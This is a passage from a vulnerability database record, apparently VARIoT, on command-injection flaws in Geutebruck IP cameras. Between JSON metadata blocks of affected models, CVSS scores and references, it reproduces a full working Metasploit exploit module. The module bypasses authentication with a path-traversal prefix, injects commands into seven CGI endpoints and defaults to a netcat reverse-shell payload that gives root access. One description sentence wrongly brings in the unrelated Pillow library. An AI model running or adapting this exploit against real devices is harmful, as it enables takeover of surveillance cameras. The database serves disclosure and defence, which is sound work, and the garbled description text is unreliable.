            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:22.657000",
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:51.757000",
            "db": "NVD",
            "id": "CVE-2021-33548"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in G-Cam E2 and G-Code made by GEUTEBRUCK",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2089"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0848

    Vulnerability from variot - Updated: 2025-01-30 21:38

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK: * Lack of authentication for important features (CWE-306) - CVE-2021-33543; * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554; * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on the vulnerability, but may include the following: * Confidential information is stolen by a remote third party because of improper default user authentication settings - CVE-2021-33543; * Arbitrary code is executed by a remote third party through command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554; * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545; * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546; * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547; * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    # Metasploit remote exploit module for the Geutebruck command-injection CVEs
    # listed under 'References'. Per its own Description it applies to firmware
    # <= 1.12.0.27 plus 1.12.13.2 and 1.12.14.5, the same versions `check` tests.
    #
    # Reviewer notes for defenders, taken from the target table below:
    # - every target requests a path that starts with `/../uapi-cgi/`; this prefix
    #   is presumably the basic-auth bypass the Description mentions -- confirm
    #   against the vendor advisory;
    # - six of the seven targets carry the injected value inside `$( ... )` in one
    #   query parameter; testcmd.cgi takes it directly in `command`;
    # - `check` only fetches `/brand.xml`, so a version probe leaves that request
    #   in the access log without any injection attempt.
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      # AutoCheck makes the framework run `check` before `exploit`.
      prepend Msf::Exploit::Remote::AutoCheck

      # Registers the module metadata: affected products, CVE references, one
      # target per vulnerable CGI page, and the default payload.
      #
      # @param info [Hash] metadata passed in by the framework, merged via update_info
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Geutebruck Multiple Remote Command Execution',
            'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

            'Author' => [
              'Titouan Lazard', # Of RandoriSec - Discovery
              'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
              'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2021-33543'],
              ['CVE', '2021-33544'],
              ['CVE', '2021-33548'],
              ['CVE', '2021-33550'],
              ['CVE', '2021-33551'],
              ['CVE', '2021-33552'],
              ['CVE', '2021-33553'],
              ['CVE', '2021-33554'],
              [ 'URL', 'http://geutebruck.com' ],
              [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
              [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
            ],
            'DisclosureDate' => '2021-07-08',
            'Privileged' => true,
            'Platform' => ['unix', 'linux'],
            'Arch' => [ARCH_CMD],
            # Each target is [label, options]: the HTTP method, the query
            # parameters, and the CGI path. PLACEHOLDER_CMD marks the single
            # parameter that `exploit` rewrites; the Rex::Text.rand_text_* values
            # are filler generated when this constructor runs, so they differ
            # between module instances and are not stable log signatures.
            'Targets' => [
              [
                'CVE-2021-33544 - certmngr.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'createselfcert',
                    'local' => Rex::Text.rand_text_alphanumeric(10..16),
                    'country' => Rex::Text.rand_text_alphanumeric(2),
                    'state' => '$(PLACEHOLDER_CMD)',
                    'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                    'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                    'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                    'days' => Rex::Text.rand_text_numeric(2..4),
                    'type' => Rex::Text.rand_text_numeric(2..4)
                  },
                  'uri' => '/../uapi-cgi/certmngr.cgi'
                }
              ],
              [
                'CVE-2021-33548 - factory.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/factory.cgi'
                }
              ],
              [
                'CVE-2021-33550 - language.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/language.cgi'
                }
              ],
              [
                'CVE-2021-33551 - oem.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'set',
                    'enable' => 'yes',
                    'environment.lang' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/oem.cgi'
                }
              ],
              [
                'CVE-2021-33552 - simple_reclistjs.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'get',
                    'timekey' => Rex::Text.rand_text_numeric(2..4),
                    'date' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
                }
              ],
              [
                # The only target whose placeholder is not wrapped in `$( )`.
                'CVE-2021-33553 - testcmd.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
                  'uri' => '/../uapi-cgi/testcmd.cgi'
                }
              ],
              [
                'CVE-2021-33554 - tmpapp.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/tmpapp.cgi'
                }
              ]
            ],
            'DefaultTarget' => 0,
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
            },
            # The module declares ARTIFACTS_ON_DISK as a side effect; which files
            # are left on the device is not shown in this listing.
            'Notes' => {
              'Stability' => ['CRASH_SAFE'],
              'Reliability' => ['REPEATABLE_SESSION'],
              'SideEffects' => ['ARTIFACTS_ON_DISK']
            }
          )
        )
      end

      # Reads the firmware version the device reports in `/brand.xml`.
      #
      # @return [String, false] the first dotted four-part version found in the
      #   <firmware> element, or false when the request fails, the body is empty,
      #   the element is missing, or its text holds no such version
      def firmware
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => '/brand.xml'
        )
        unless res
          print_error('Connection failed!')
          return false
        end

        unless res&.body && !res.body.empty?
          print_error('Empty body in the response!')
          return false
        end

        res_xml = res.get_xml_document
        if res_xml.at('//firmware').nil?
          print_error('Target did not respond with a XML document containing the "firmware" element!')
          return false
        end
        raw_text = res_xml.at('//firmware').text
        # The pattern is unanchored: it takes the first d.ddd.ddd.ddd-shaped run
        # anywhere in the element text and ignores whatever surrounds it.
        if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
          raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
        else
          print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
          false
        end
      end

      # Version-only vulnerability check; it sends no injection request.
      #
      # @return [CheckCode] Unknown when no version could be read, Appears for
      #   firmware <= 1.12.0.27 or exactly 1.12.13.2 / 1.12.14.5, Safe otherwise
      def check
        version = firmware
        if version == false
          return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
        end

        rex_version = Rex::Version.new(version)
        vprint_status("Found Geutebruck version #{rex_version}")
        # The verdict rests only on the self-reported version string, so for patch
        # triage it is no stronger evidence than reading /brand.xml by hand.
        if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
          return CheckCode::Appears
        end

        CheckCode::Safe
      end

      # Sends one HTTP request for the selected target, with the encoded payload
      # substituted for PLACEHOLDER_CMD in that target's parameters.
      def exploit
        print_status("#{rhost}:#{rport} - Setting up request...")

        # Every target in this listing uses GET, so 'vars_get' is the key used.
        method = target['http_method']
        if method == 'GET'
          http_method_vars = 'vars_get'
        else
          http_method_vars = 'vars_post'
        end

        # String#[]= rewrites the target's own parameter strings in place; the
        # values are taken from the target hash, not copied.
        http_vars = target['http_vars']
        http_vars.each do |(k, v)|
          if v.include? 'PLACEHOLDER_CMD'
            http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
          end
        end

        print_status("Sending CMD injection request to #{rhost}:#{rport}")
        # The response is discarded, so the closing status line below is printed
        # whether or not the device accepted the request.
        send_request_cgi(
          {
            'method' => method,
            'uri' => target['uri'],
            http_method_vars => http_vars
          }
        )
        print_status('Exploit complete, you should get a shell as the root user!')
      end
    end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0848",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33552",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33552",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33552",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33552",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33552",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2085",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2085"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33552"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
